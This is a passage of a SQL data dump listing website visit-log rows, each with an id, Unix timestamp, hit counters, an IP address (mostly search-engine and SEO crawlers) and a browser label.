406341,1553829882,1,1,0,0,'54.36.150.44','other'),(406342,1553830458,1,1,0,0,'46.229.168.153','other'),(406343,1553830599,1,1,0,0,'54.36.148.97','other'),(406344,1553830907,1,1,0,0,'54.36.148.104','other'),(406345,1553831014,1,1,0,0,'66.249.64.29','chrome'),(406346,1553831425,1,1,0,0,'46.229.168.163','other'),(406347,1553831576,1,1,0,0,'54.36.148.31','other'),(406348,1553831797,2,2,0,0,'66.249.64.31','chrome'),(406349,1553831852,1,1,0,0,'54.36.148.141','other'),(406350,1553831966,1,1,0,0,'54.36.150.32','other'),(406351,1553831979,1,1,0,0,'46.229.168.134','other'),(406352,1553832075,1,1,0,0,'8.29.198.26','other'),(406353,1553832098,1,1,0,0,'8.29.198.27','other'),(406354,1553832393,1,1,0,0,'46.229.168.135','other'),(406355,1553832448,1,1,0,0,'54.36.149.23','other'),(406356,1553832455,1,1,0,0,'54.36.149.94','other'),(406357,1553832552,2,2,0,0,'40.77.167.140','other'),(406358,1553832594,1,1,0,0,'54.36.148.107','other'),(406359,1553832738,2,2,0,0,'46.229.168.130','other'),(406360,1553832844,1,1,0,0,'46.229.168.142','other'),(406361,1553832897,1,1,0,0,'46.229.168.148','other'),(406362,1553833056,1,1,0,0,'54.36.150.63','other'),(406363,1553833183,2,2,0,0,'66.249.64.29','chrome'),(406364,1553833266,1,1,0,0,'178.154.244.11','other'),(406365,1553833348,1,1,0,0,'157.55.39.118','other'),(406366,1553833443,2,2,0,0,'46.229.168.136','other'),(406367,1553834087,1,1,0,0,'207.46.13.207','other'),(406368,1553834118,1,1,0,0,'54.36.148.194','other'),(406369,1553834329,1,1,0,0,'54.36.148.105','other'),(406370,1553834331,1,1,0,0,'46.229.168.142','other'),(406371,1553835123,1,1,0,0,'54.36.150.21','other'),(406372,1553835371,1,1,0,0,'46.229.168.132','other'),(406373,1553835617,1,1,0,0,'180.76.15.15','other'),(406374,1553835861,1,1,0,0,'54.36.149.98','other'),(406375,1553836018,1,1,0,0,'46.229.168.140','other'),(406376,1553836212,1,1,0,0,'54.36.150.189','other'),(406377,1553836258,3,3,0,0,'66.249.64.60','chrome'),(406378,1553836267,1,1,0,0,'66.249.64.58','chrome'),(406379,1553836305,1,1,0,0,'54.36.150.0','other'),(406380,1553836391,1,1,0,0,'40.77.167.140','other'),(406381,1553836441,1,1,0,0,'54.36.149.65','other'),(406382,1553836705,1,1,0,0,'54.36.149.13','other'),(406383,1553836880,1,1,0,0,'66.249.64.29','chrome'),(406384,1553837051,1,1,0,0,'91.196.178.130','firefox'),(406385,1553837072,1,1,0,0,'42.236.10.114','other'),(406386,1553837076,1,1,0,0,'180.163.220.5','other'),(406387,1553837103,1,1,0,0,'180.163.220.3','other'),(406388,1553837205,1,1,0,0,'54.36.148.52','other'),(406389,1553837300,1,1,0,0,'66.102.9.60','chrome'),(406390,1553837495,1,1,0,0,'46.229.168.148','other'),(406391,1553838072,1,1,0,0,'54.36.148.59','other'),(406392,1553838551,1,1,0,0,'66.249.64.60','chrome'),(406393,1553838559,1,1,0,0,'66.249.64.58','chrome'),(406394,1553838663,1,1,0,0,'54.36.149.67','other'),(406395,1553838715,2,2,0,0,'34.220.83.69','chrome'),(406396,1553838846,1,1,0,0,'54.36.148.46','other'),(406397,1553838861,1,1,0,0,'54.36.148.197','other'),(406398,1553838889,1,1,0,0,'54.36.150.69','other'),(406399,1553838930,1,1,0,0,'40.77.167.39','other'),(406400,1553839009,1,1,0,0,'54.36.150.95','other'),(406401,1553839519,1,1,0,0,'54.36.150.116','other'),(406402,1553839868,1,1,0,0,'66.249.64.29','chrome'),(406403,1553839887,1,1,0,0,'54.36.148.60','other'),(406404,1553839915,1,1,0,0,'66.249.64.30','chrome'),(406405,1553840021,1,1,0,0,'54.36.148.155','other'),(406406,1553840104,1,1,0,0,'54.36.150.64','other'),(406407,1553840397,1,1,0,0,'54.36.150.165','other'),(406408,1553840715,1,1,0,0,'54.36.150.75','other'),(406409,1553840964,1,1,0,0,'54.36.150.156','other'),(406410,1553841190,1,1,0,0,'54.36.149.21','other'),(406411,1553841261,1,1,0,0,'185.220.101.62','other'),(406412,1553841563,1,1,0,0,'66.249.64.30','chrome'),(406413,1553841636,1,1,0,0,'54.36.148.199','other'),(406414,1553841697,1,1,0,0,'40.77.167.39','other'),(406415,1553841752,1,1,0,0,'54.36.148.160','other'),(406416,1553841840,1,1,0,0,'66.249.64.31','chrome'),(406417,1553841933,1,1,0,0,'54.36.148.180','other'),(406418,1553842112,1,1,0,0,'54.36.148.200','other'),(406419,1553842233,1,1,0,0,'40.77.167.4','other'),(406420,1553842279,1,1,0,0,'54.36.148.120','other'),(406421,1553842362,1,1,0,0,'54.36.149.92','other'),(406422,1553842524,1,1,0,0,'54.36.148.59','other'),(406423,1553842916,1,1,0,0,'8.29.198.25','other'),(406424,1553842956,1,1,0,0,'8.29.198.27','other'),(406425,1553843240,1,1,0,0,'54.36.150.48','other'),(406426,1553843400,1,1,0,0,'207.46.13.179','other'),(406427,1553843452,1,1,0,0,'46.229.168.130','other'),(406428,1553843535,1,1,0,0,'54.36.150.4','other'),(406429,1553843613,1,1,0,0,'141.8.142.103','other'),(406430,1553843695,1,1,0,0,'91.196.178.90','firefox'),(406431,1553843791,1,1,0,0,'5.45.207.19','other'),(406432,1553843940,1,1,0,0,'54.36.148.236','other'),(406433,1553844145,1,1,0,0,'91.196.178.92','firefox'),(406434,1553844181,1,1,0,0,'95.108.213.4','other'),(406435,1553844341,2,2,0,0,'5.45.207.79','other'),(406436,1553844359,3,3,0,0,'66.249.64.29','chrome'),(406437,1553844416,2,2,0,0,'178.154.244.11','other'),(406438,1553844848,1,1,0,0,'40.77.167.4','other'),(406439,1553844850,1,1,0,0,'54.36.150.143','other'),(406440,1553844921,1,1,0,0,'157.55.39.248','other'),(406441,1553844922,1,1,0,0,'54.36.150.51','other'),(406442,1553845118,1,1,0,0,'91.196.178.92','firefox'),(406443,1553845323,1,1,0,0,'54.36.148.203','other'),(406444,1553845735,1,1,0,0,'66.249.64.29','chrome'),(406445,1553845923,1,1,0,0,'46.229.168.148','other'),(406446,1553845927,1,1,0,0,'54.36.148.31','other'),(406447,1553845955,1,1,0,0,'207.46.13.179','other'),(406448,1553846147,1,1,0,0,'54.36.148.243','other'),(406449,1553846224,1,1,0,0,'54.36.150.43','other'),(406450,1553846426,1,1,0,0,'66.249.64.31','chrome'),(406451,1553846550,1,1,0,0,'54.36.150.38','other'),(406452,1553846776,1,1,0,0,'54.36.150.171','other'),(406453,1553846886,1,1,0,0,'54.36.148.107','other'),(406454,1553847598,1,1,0,0,'54.36.149.65','other'),(406455,1553847643,1,1,0,0,'54.36.150.147','other'),(406456,1553848214,1,1,0,0,'54.36.148.177','other'),(406457,1553848287,1,1,0,0,'40.77.167.39','other'),(406458,1553848350,1,1,0,0,'54.36.150.143','other'),(406459,1553848539,1,1,0,0,'54.36.148.233','other'),(406460,1553848588,1,1,0,0,'66.249.64.30','chrome'),(406461,1553848937,1,1,0,0,'5.45.207.79','other'),(406462,1553849061,1,1,0,0,'54.36.148.196','other'),(406463,1553849118,1,1,0,0,'195.230.119.59','chrome'),(406464,1553849348,3,3,0,0,'207.46.13.26','other'),(406465,1553849946,1,1,0,0,'54.36.148.83','other'),(406466,1553849993,1,1,0,0,'66.249.64.30','chrome'),(406467,1553850372,1,1,0,0,'54.36.148.243','other'),(406468,1553850628,1,1,0,0,'54.36.150.18','other'),(406469,1553850715,1,1,0,0,'54.36.149.88','other'),(406470,1553850878,1,1,0,0,'54.36.149.76','other'),(406471,1553851014,1,1,0,0,'54.36.148.74','other'),(406472,1553851165,1,1,0,0,'54.36.148.247','other'),(406473,1553851208,1,1,0,0,'54.36.148.49','other'),(406474,1553851503,1,1,0,0,'54.36.148.235','other'),(406475,1553851715,1,1,0,0,'54.36.149.40','other'),(406476,1553851870,1,1,0,0,'54.36.148.75','other'),(406477,1553852142,1,1,0,0,'54.36.148.68','other'),(406478,1553852143,1,1,0,0,'66.249.64.58','chrome'),(406479,1553852857,1,1,0,0,'54.36.150.43','other'),(406480,1553853615,1,1,0,0,'54.36.149.36','other'),(406481,1553853765,1,1,0,0,'8.29.198.25','other'),(406482,1553853815,1,1,0,0,'8.29.198.26','other'),(406483,1553853845,1,1,0,0,'54.36.149.89','other'),(406484,1553853875,1,1,0,0,'54.36.150.2','other'),(406485,1553854238,1,1,0,0,'54.36.148.212','other'),(406486,1553854307,1,1,0,0,'193.106.30.98','firefox'),(406487,1553854580,1,1,0,0,'207.46.13.2','other'),(406488,1553854817,1,1,0,0,'54.36.150.159','other'),(406489,1553854865,2,2,0,0,'207.46.13.26','other'),(406490,1553855099,1,1,0,0,'54.36.149.68','other'),(406491,1553855830,1,1,0,0,'54.36.148.231','other'),(406492,1553855957,1,1,0,0,'66.249.64.31','chrome'),(406493,1553856553,1,1,0,0,'66.249.64.30','chrome'),(406494,1553856613,1,1,0,0,'54.36.150.162','other'),(406495,1553856727,1,1,0,0,'54.36.148.234','other'),(406496,1553856735,1,1,0,0,'40.77.167.57','other'),(406497,1553856872,1,0,1,0,'66.249.64.31',''),(406498,1553856889,1,0,1,0,'66.249.64.60',''),(406499,1553856961,1,1,0,0,'207.46.13.26','other'),(406500,1553857145,1,1,0,0,'141.8.142.103','other'),(406501,1553857319,2,2,0,0,'5.45.207.19','other'),(406502,1553857523,1,1,0,0,'66.249.64.31','chrome'),(406503,1553857734,1,1,0,0,'178.154.244.11','other'),(406504,1553857801,4,4,0,0,'5.45.207.79','other'),(406505,1553857967,1,1,0,0,'54.36.148.170','other'),(406506,1553858364,1,1,0,0,'54.36.148.123','other'),(406507,1553858425,1,1,0,0,'54.36.148.200','other'),(406508,1553858480,1,1,0,0,'54.36.150.95','other'),(406509,1553858486,1,1,0,0,'66.249.64.29','chrome'),(406510,1553858540,1,1,0,0,'141.8.142.103','other'),(406511,1553858761,2,2,0,0,'178.154.244.11','other'),(406512,1553858906,1,1,0,0,'66.249.64.30','chrome'),(406513,1553859074,1,1,0,0,'54.36.149.18','other'),(406514,1553859075,1,1,0,0,'46.229.168.129','other'),(406515,1553859116,1,1,0,0,'54.36.149.22','other'),(406516,1553859124,1,1,0,0,'54.36.150.106','other'),(406517,1553859174,1,1,0,0,'46.229.168.152','other'),(406518,1553859366,1,1,0,0,'54.36.148.165','other'),(406519,1553859412,1,1,0,0,'54.36.150.163','other'),(406520,1553859439,1,1,0,0,'66.249.64.31','chrome'),(406521,1553860025,1,1,0,0,'46.229.168.135','other'),(406522,1553860030,1,1,0,0,'46.229.168.139','other'),(406523,1553860032,1,1,0,0,'54.36.148.29','other'),(406524,1553860075,1,1,0,0,'66.249.64.60','chrome'),(406525,1553860203,1,1,0,0,'207.46.13.26','other'),(406526,1553860223,1,1,0,0,'54.36.148.201','other'),(406527,1553860224,1,1,0,0,'54.36.150.187','other'),(406528,1553860242,1,1,0,0,'54.36.150.72','other'),(406529,1553860664,1,1,0,0,'54.36.148.119','other'),(406530,1553860735,1,1,0,0,'66.249.64.29','chrome'),(406531,1553860884,1,1,0,0,'91.196.178.72','chrome'),(406532,1553861075,1,1,0,0,'54.36.150.106','other'),(406533,1553861215,1,1,0,0,'40.77.167.168','other'),(406534,1553861337,1,1,0,0,'54.36.150.191','other'),(406535,1553861433,1,1,0,0,'54.36.150.54','other'),(406536,1553861728,1,1,0,0,'54.36.150.61','other'),(406537,1553861889,1,1,0,0,'207.46.13.2','other'),(406538,1553861926,1,1,0,0,'54.36.148.55','other'),(406539,1553862227,1,1,0,0,'91.196.178.71','chrome'),(406540,1553862248,1,1,0,0,'13.57.233.99','chrome'),(406541,1553862305,1,1,0,0,'54.36.150.129','other'),(406542,1553862460,1,1,0,0,'207.46.13.232','other'),(406543,1553862540,2,2,0,0,'66.249.64.31','chrome'),(406544,1553862630,1,1,0,0,'54.36.150.95','other'),(406545,1553862902,1,1,0,0,'54.36.150.115','other'),(406546,1553863024,1,1,0,0,'178.95.247.170','chrome'),(406547,1553863051,1,1,0,0,'54.36.148.207','other'),(406548,1553863538,1,1,0,0,'54.36.149.28','other'),(406549,1553863669,1,1,0,0,'66.249.64.30','chrome'),(406550,1553863701,1,1,0,0,'54.36.148.253','other'),(406551,1553863954,1,1,0,0,'66.249.64.29','chrome'),(406552,1553864051,1,1,0,0,'40.77.167.121','other'),(406553,1553864298,1,1,0,0,'180.76.15.159','other'),(406554,1553864382,1,1,0,0,'54.36.148.86','other'),(406555,1553864455,1,1,0,0,'54.36.148.57','other'),(406556,1553864457,1,1,0,0,'91.196.178.71','chrome'),(406557,1553864621,1,1,0,0,'8.29.198.25','other'),(406558,1553864676,1,1,0,0,'8.29.198.27','other'),(406559,1553864892,3,3,0,0,'40.77.167.119','other'),(406560,1553865090,1,1,0,0,'54.36.150.169','other'),(406561,1553865120,1,1,0,0,'54.36.149.78','other'),(406562,1553865557,1,1,0,0,'54.36.148.8','other'),(406563,1553865837,2,2,0,0,'40.77.167.119','other'),(406564,1553865943,1,1,0,0,'54.36.149.41','other'),(406565,1553866334,1,1,0,0,'54.36.150.31','other'),(406566,1553866490,2,2,0,0,'66.249.64.29','chrome'),(406567,1553866533,1,1,0,0,'54.36.149.34','other'),(406568,1553866581,1,1,0,0,'91.124.182.170','firefox'),(406569,1553866624,2,2,0,0,'40.77.167.121','other'),(406570,1553866656,1,1,0,0,'54.36.149.31','other'),(406571,1553866703,1,1,0,0,'54.36.148.32','other'),(406572,1553866992,1,1,0,0,'54.36.148.66','other'),(406573,1553867094,1,1,0,0,'180.76.15.19','other'),(406574,1553867242,1,1,0,0,'54.36.150.160','other'),(406575,1553867725,1,1,0,0,'91.196.177.46','chrome'),(406576,1553867730,1,1,0,0,'66.249.64.62','chrome'),(406577,1553867794,2,2,0,0,'66.249.64.30','chrome'),(406578,1553867803,1,1,0,0,'54.36.149.57','other'),(406579,1553867878,1,1,0,0,'46.229.168.139','other'),(406580,1553868009,1,1,0,0,'66.249.64.29','chrome'),(406581,1553868224,1,1,0,0,'54.36.148.149','other'),(406582,1553868523,1,1,0,0,'54.36.150.6','other'),(406583,1553868651,1,1,0,0,'157.55.39.106','other'),(406584,1553869009,1,1,0,0,'54.36.148.141','other'),(406585,1553869916,1,1,0,0,'5.45.207.19','other'),(406586,1553870449,1,1,0,0,'40.77.167.120','other'),(406587,1553870547,1,1,0,0,'157.55.39.106','other'),(406588,1553871651,2,2,0,0,'66.249.64.30','chrome'),(406589,1553872346,1,1,0,0,'185.62.188.225','other'),(406590,1553872454,1,1,0,0,'40.77.167.121','other'),(406591,1553872630,2,2,0,0,'40.77.167.118','other'),(406592,1553873050,2,2,0,0,'66.249.64.30','chrome'),(406593,1553873917,1,1,0,0,'46.229.168.161','other'),(406594,1553873918,1,1,0,0,'207.46.13.178','other'),(406595,1553874864,4,4,0,0,'66.249.64.29','chrome'),(406596,1553875180,1,1,0,0,'66.249.64.62','chrome'),(406597,1553875283,1,1,0,0,'54.36.149.85','other'),(406598,1553875474,2,2,0,0,'8.29.198.25','other'),(406599,1553875560,1,1,0,0,'66.249.64.30','chrome'),(406600,1553875673,1,1,0,0,'207.46.13.178','other'),(406601,1553875719,1,1,0,0,'54.36.150.136','other'),(406602,1553875781,1,1,0,0,'54.36.148.237','other'),(406603,1553875796,1,1,0,0,'54.36.148.59','other'),(406604,1553875801,1,1,0,0,'54.36.148.244','other'),(406605,1553876301,1,1,0,0,'54.36.150.75','other'),(406606,1553876360,1,1,0,0,'46.229.168.147','other'),(406607,1553876451,1,1,0,0,'46.229.168.132','other'),(406608,1553876631,1,1,0,0,'54.36.148.35','other'),(406609,1553876815,1,1,0,0,'54.36.149.65','other'),(406610,1553877006,1,1,0,0,'193.164.94.133','chrome'),(406611,1553877092,1,1,0,0,'54.36.150.153','other'),(406612,1553877244,1,1,0,0,'46.211.125.41','chrome'),(406613,1553877396,1,1,0,0,'5.45.207.79','other'),(406614,1553877439,1,1,0,0,'54.36.149.39','other'),(406615,1553877477,1,1,0,0,'54.36.150.75','other'),(406616,1553877481,1,1,0,0,'66.249.64.30','chrome'),(406617,1553877549,1,1,0,0,'178.154.244.11','other'),(406618,1553877701,3,3,0,0,'141.8.142.103','other'),(406619,1553877741,1,1,0,0,'54.36.149.67','other'),(406620,1553877975,1,1,0,0,'87.250.224.47','other'),(406621,1553878045,1,1,0,0,'95.108.213.4','other'),(406622,1553878430,1,1,0,0,'54.36.148.107','other'),(406623,1553878442,1,1,0,0,'92.113.126.26','chrome'),(406624,1553878484,1,1,0,0,'54.36.148.0','other'),(406625,1553879302,1,1,0,0,'54.36.149.46','other'),(406626,1553879408,1,1,0,0,'40.77.167.135','other'),(406627,1553879824,1,1,0,0,'54.36.148.214','other'),(406628,1553879918,1,1,0,0,'92.113.126.26','chrome'),(406629,1553880431,1,1,0,0,'54.36.148.50','other'),(406630,1553880800,1,1,0,0,'46.229.168.130','other'),(406631,1553880805,1,1,0,0,'66.249.64.62','chrome'),(406632,1553880908,1,1,0,0,'54.36.148.84','other'),(406633,1553880918,1,1,0,0,'54.36.150.164','other'),(406634,1553881141,1,1,0,0,'46.229.168.151','other'),(406635,1553881301,1,1,0,0,'54.36.149.6','other'),(406636,1553881408,1,1,0,0,'54.36.148.85','other'),(406637,1553881465,1,1,0,0,'54.36.148.16','other'),(406638,1553881534,1,1,0,0,'54.36.149.8','other'),(406639,1553881942,1,1,0,0,'54.36.148.91','other'),(406640,1553882011,1,1,0,0,'54.36.149.70','other'),(406641,1553882149,1,1,0,0,'46.229.168.140','other'),(406642,1553882369,1,1,0,0,'54.36.148.36','other'),(406643,1553882549,1,1,0,0,'91.196.178.104','chrome'),(406644,1553882554,1,1,0,0,'54.36.148.222','other'),(406645,1553882602,1,1,0,0,'54.36.148.76','other'),(406646,1553882799,1,1,0,0,'54.36.148.59','other'),(406647,1553883020,1,1,0,0,'54.36.149.107','other'),(406648,1553883309,1,1,0,0,'54.36.148.121','other'),(406649,1553883562,2,2,0,0,'66.249.64.31','chrome'),(406650,1553883935,1,1,0,0,'54.36.148.208','other'),(406651,1553883986,1,1,0,0,'54.36.150.118','other'),(406652,1553884119,1,1,0,0,'13.66.139.0','other'),(406653,1553884176,1,1,0,0,'46.229.168.136','other'),(406654,1553884240,1,1,0,0,'54.36.148.174','other'),(406655,1553884428,1,1,0,0,'54.36.148.177','other'),(406656,1553884507,1,1,0,0,'66.249.64.30','chrome'),(406657,1553884536,1,1,0,0,'46.229.168.154','other'),(406658,1553884792,1,1,0,0,'66.249.64.29','chrome'),(406659,1553885204,1,1,0,0,'178.140.152.194','msie'),(406660,1553885277,1,1,0,0,'46.229.168.135','other'),(406661,1553885525,1,1,0,0,'54.36.148.67','other'),(406662,1553885573,1,1,0,0,'207.46.13.208','other'),(406663,1553885788,1,1,0,0,'157.55.39.184','other'),(406664,1553886130,2,2,0,0,'37.9.113.103','other'),(406665,1553886326,2,2,0,0,'8.29.198.27','other'),(406666,1553886852,1,1,0,0,'5.188.210.44','chrome'),(406667,1553887209,1,1,0,0,'46.229.168.143','other'),(406668,1553887915,1,1,0,0,'46.229.168.139','other'),(406669,1553887936,1,1,0,0,'157.55.39.184','other'),(406670,1553888106,1,1,0,0,'54.36.150.17','other'),(406671,1553888140,1,1,0,0,'46.229.168.147','other'),(406672,1553888258,1,1,0,0,'66.249.76.125','chrome'),(406673,1553888621,1,1,0,0,'54.36.150.131','other'),(406674,1553888623,1,1,0,0,'54.36.149.73','other'),(406675,1553888766,1,1,0,0,'54.36.148.175','other'),(406676,1553888771,1,1,0,0,'54.36.150.144','other'),(406677,1553888991,1,1,0,0,'157.55.39.184','other'),(406678,1553889261,1,1,0,0,'54.36.150.191','other'),(406679,1553889374,1,1,0,0,'54.36.148.20','other'),(406680,1553889418,2,2,0,0,'66.249.64.30','chrome'),(406681,1553889518,1,1,0,0,'54.36.149.101','other'),(406682,1553889638,1,1,0,0,'46.229.168.143','other'),(406683,1553889751,1,1,0,0,'54.36.149.3','other'),(406684,1553889862,1,1,0,0,'54.36.149.76','other'),(406685,1553890030,1,1,0,0,'157.55.39.184','other'),(406686,1553890405,1,1,0,0,'54.36.148.49','other'),(406687,1553890486,1,1,0,0,'180.76.15.25','other'),(406688,1553890488,1,1,0,0,'54.36.149.17','other'),(406689,1553890650,1,1,0,0,'54.36.148.35','other'),(406690,1553891036,2,2,0,0,'157.55.39.184','other'),(406691,1553891118,1,1,0,0,'54.36.150.33','other'),(406692,1553891219,1,1,0,0,'207.46.13.209','other'),(406693,1553891308,1,1,0,0,'54.36.150.44','other'),(406694,1553891365,1,1,0,0,'54.36.149.88','other'),(406695,1553891610,1,1,0,0,'54.36.150.25','other'),(406696,1553891662,2,2,0,0,'66.249.64.29','chrome'),(406697,1553891780,1,1,0,0,'66.249.64.60','chrome'),(406698,1553891906,1,1,0,0,'66.249.64.31','chrome'),(406699,1553892078,1,1,0,0,'54.36.149.26','other'),(406700,1553892105,1,1,0,0,'54.36.148.70','other'),(406701,1553892202,1,1,0,0,'46.229.168.152','other'),(406702,1553892564,2,2,0,0,'157.55.39.184','other'),(406703,1553892905,1,1,0,0,'91.224.178.82','other'),(406704,1553893052,1,1,0,0,'54.36.150.21','other'),(406705,1553893070,1,1,0,0,'54.36.150.66','other'),(406706,1553893120,1,1,0,0,'5.173.176.53','chrome'),(406707,1553893162,3,3,0,0,'66.249.64.30','chrome'),(406708,1553893391,1,1,0,0,'54.36.150.161','other'),(406709,1553893447,2,2,0,0,'46.229.168.149','other'),(406710,1553893463,1,1,0,0,'54.36.148.134','other'),(406711,1553893559,1,1,0,0,'46.229.168.130','other'),(406712,1553893582,1,1,0,0,'207.46.13.140','other'),(406713,1553893684,1,1,0,0,'46.229.168.140','other'),(406714,1553893708,1,1,0,0,'54.36.148.26','other'),(406715,1553894592,1,1,0,0,'5.45.207.19','other'),(406716,1553894655,1,1,0,0,'54.36.150.103','other'),(406717,1553894761,4,4,0,0,'66.249.64.29','chrome'),(406718,1553894768,1,1,0,0,'66.249.64.30','chrome'),(406719,1553894779,1,1,0,0,'46.229.168.151','other'),(406720,1553894965,1,1,0,0,'46.229.168.142','other'),(406721,1553895247,1,1,0,0,'54.36.150.146','other'),(406722,1553895505,1,1,0,0,'54.36.149.57','other'),(406723,1553895689,1,1,0,0,'54.36.148.21','other'),(406724,1553895918,1,1,0,0,'54.36.150.123','other'),(406725,1553896517,1,1,0,0,'66.249.64.31','chrome'),(406726,1553896530,1,1,0,0,'54.36.150.125','other'),(406727,1553896649,1,1,0,0,'54.36.150.93','other'),(406728,1553896874,1,1,0,0,'54.36.150.118','other'),(406729,1553896913,1,1,0,0,'207.46.13.192','other'),(406730,1553897194,1,1,0,0,'8.29.198.27','other'),(406731,1553897252,1,1,0,0,'8.29.198.25','other'),(406732,1553897573,1,1,0,0,'54.36.150.171','other'),(406733,1553897841,1,1,0,0,'207.46.13.192','other'),(406734,1553898489,1,1,0,0,'66.249.64.30','chrome'),(406735,1553898545,1,1,0,0,'66.249.64.31','chrome'),(406736,1553898557,1,1,0,0,'66.249.64.29','chrome'),(406737,1553898628,1,1,0,0,'40.77.167.147','other'),(406738,1553898928,1,1,0,0,'54.36.150.64','other'),(406739,1553899078,1,1,0,0,'54.36.148.14','other'),(406740,1553899111,1,1,0,0,'54.36.150.72','other'),(406741,1553899131,1,1,0,0,'207.46.13.140','other'),(406742,1553899461,1,1,0,0,'40.77.167.69','other'),(406743,1553899575,1,1,0,0,'46.229.168.130','other'),(406744,1553899629,1,1,0,0,'54.36.149.27','other'),(406745,1553899842,1,1,0,0,'95.28.225.171','msie'),(406746,1553899884,2,2,0,0,'66.249.64.29','chrome'),(406747,1553900597,1,1,0,0,'66.249.64.30','chrome'),(406748,1553900637,1,1,0,0,'54.36.149.44','other'),(406749,1553900690,1,1,0,0,'40.77.167.147','other'),(406750,1553900768,1,1,0,0,'46.229.168.163','other'),(406751,1553900831,1,1,0,0,'54.36.148.190','other'),(406752,1553900858,1,1,0,0,'54.36.148.246','other'),(406753,1553900944,1,1,0,0,'54.36.148.154','other'),(406754,1553901324,1,1,0,0,'54.36.149.62','other'),(406755,1553901325,1,1,0,0,'54.36.150.160','other'),(406756,1553901338,1,1,0,0,'54.36.148.224','other'),(406757,1553901579,1,1,0,0,'54.36.148.98','other'),(406758,1553901705,1,1,0,0,'54.36.149.97','other'),(406759,1553901744,1,1,0,0,'46.229.168.148','other'),(406760,1553901748,1,1,0,0,'95.108.213.4','other'),(406761,1553902164,1,1,0,0,'54.36.148.241','other'),(406762,1553902226,1,1,0,0,'46.229.168.130','other'),(406763,1553902279,1,1,0,0,'180.76.15.141','other'),(406764,1553902563,1,1,0,0,'54.36.148.76','other'),(406765,1553902930,1,1,0,0,'54.36.150.30','other'),(406766,1553903172,1,1,0,0,'54.36.148.134','other'),(406767,1553903188,1,1,0,0,'54.36.148.24','other'),(406768,1553903251,1,1,0,0,'54.36.150.165','other'),(406769,1553903673,1,1,0,0,'40.77.167.71','other'),(406770,1553903803,1,1,0,0,'54.36.148.98','other'),(406771,1553904208,1,1,0,0,'54.36.150.91','other'),(406772,1553904251,1,1,0,0,'66.249.64.31','chrome'),(406773,1553904518,1,1,0,0,'54.36.150.179','other'),(406774,1553904615,1,1,0,0,'46.229.168.145','other'),(406775,1553904645,1,1,0,0,'207.46.13.165','other'),(406776,1553904826,1,1,0,0,'54.36.148.17','other'),(406777,1553904903,1,1,0,0,'54.36.149.16','other'),(406778,1553905126,1,1,0,0,'54.36.148.221','other'),(406779,1553905140,1,1,0,0,'54.36.149.68','other'),(406780,1553905231,1,1,0,0,'40.77.167.147','other'),(406781,1553905546,2,2,0,0,'66.249.64.29','chrome'),(406782,1553905575,1,1,0,0,'54.36.148.161','other'),(406783,1553905614,1,1,0,0,'66.249.64.30','chrome'),(406784,1553905720,3,3,0,0,'40.77.167.71','other'),(406785,1553906039,1,1,0,0,'54.36.148.4','other'),(406786,1553906058,1,1,0,0,'54.36.150.88','other'),(406787,1553906138,1,1,0,0,'54.36.148.117','other'),(406788,1553906226,1,1,0,0,'54.36.150.46','other'),(406789,1553906276,1,1,0,0,'54.36.149.14','other'),(406790,1553906351,1,1,0,0,'40.77.167.69','other'),(406791,1553906505,1,1,0,0,'46.229.168.153','other'),(406792,1553906508,1,1,0,0,'46.229.168.133','other'),(406793,1553907224,2,2,0,0,'40.77.167.71','other'),(406794,1553907527,1,1,0,0,'109.74.154.72','chrome'),(406795,1553907535,1,1,0,0,'54.148.211.92','other'),(406796,1553907538,1,1,0,0,'54.36.150.103','other'),(406797,1553907752,1,1,0,0,'54.36.149.96','other'),(406798,1553907789,1,1,0,0,'54.36.150.129','other'),(406799,1553907917,1,1,0,0,'54.36.148.249','other'),(406800,1553908040,1,1,0,0,'8.29.198.26','other'),(406801,1553908098,1,1,0,0,'8.29.198.25','other'),(406802,1553908342,1,1,0,0,'46.229.168.137','other'),(406803,1553908419,1,1,0,0,'40.77.167.69','other'),(406804,1553908668,1,1,0,0,'54.36.149.80','other'),(406805,1553908859,1,1,0,0,'54.36.148.26','other'),(406806,1553909039,1,1,0,0,'66.249.64.31','chrome'),(406807,1553909041,1,1,0,0,'46.229.168.130','other'),(406808,1553909175,1,1,0,0,'66.249.64.58','chrome'),(406809,1553909177,1,1,0,0,'54.36.148.252','other'),(406810,1553909184,1,1,0,0,'87.250.224.47','other'),(406811,1553909234,1,1,0,0,'40.77.167.147','other'),(406812,1553909248,1,1,0,0,'5.45.207.79','other'),(406813,1553909280,1,1,0,0,'46.229.168.133','other'),(406814,1553909360,1,1,0,0,'46.229.168.143','other'),(406815,1553909370,1,1,0,0,'46.229.168.147','other'),(406816,1553909400,1,1,0,0,'54.36.148.220','other'),(406817,1553909477,2,2,0,0,'178.154.244.65','other'),(406818,1553909646,1,1,0,0,'178.154.171.27','other'),(406819,1553909665,1,1,0,0,'141.8.142.108','other'),(406820,1553909667,1,1,0,0,'5.45.207.19','other'),(406821,1553909807,1,1,0,0,'54.36.149.40','other'),(406822,1553909892,1,1,0,0,'46.229.168.161','other'),(406823,1553910243,1,1,0,0,'40.77.167.147','other'),(406824,1553910342,1,1,0,0,'54.36.150.128','other'),(406825,1553910406,1,1,0,0,'54.36.148.63','other'),(406826,1553910425,1,1,0,0,'66.249.64.29','chrome'),(406827,1553910523,1,1,0,0,'46.229.168.149','other'),(406828,1553910555,1,1,0,0,'54.36.148.215','other'),(406829,1553910598,2,2,0,0,'66.249.64.30','chrome'),(406830,1553910621,1,1,0,0,'40.77.167.136','other'),(406831,1553910998,1,1,0,0,'54.36.150.69','other'),(406832,1553911068,1,1,0,0,'46.229.168.148','other'),(406833,1553911222,1,1,0,0,'54.36.150.119','other'),(406834,1553911440,1,1,0,0,'54.36.148.76','other'),(406835,1553911801,1,1,0,0,'54.36.148.101','other'),(406836,1553911982,1,1,0,0,'207.46.13.165','other'),(406837,1553912342,1,1,0,0,'66.249.64.29','chrome'),(406838,1553912483,1,1,0,0,'54.36.150.19','other'),(406839,1553912505,1,1,0,0,'54.36.148.31','other'),(406840,1553912808,2,2,0,0,'52.42.215.25','chrome'),(406841,1553913255,1,1,0,0,'66.249.64.31','chrome'),(406842,1553913623,1,1,0,0,'54.36.148.50','other'),(406843,1553913833,1,1,0,0,'54.36.149.20','other'),(406844,1553913972,1,1,0,0,'66.249.64.60','chrome'),(406845,1553914008,1,1,0,0,'66.249.64.30','chrome'),(406846,1553914195,1,1,0,0,'40.77.167.10','other'),(406847,1553914217,2,2,0,0,'66.249.64.29','chrome'),(406848,1553914463,1,1,0,0,'46.229.168.161','other'),(406849,1553914500,1,1,0,0,'54.36.148.189','other'),(406850,1553914779,1,1,0,0,'54.36.148.12','other'),(406851,1553914828,1,1,0,0,'54.36.148.235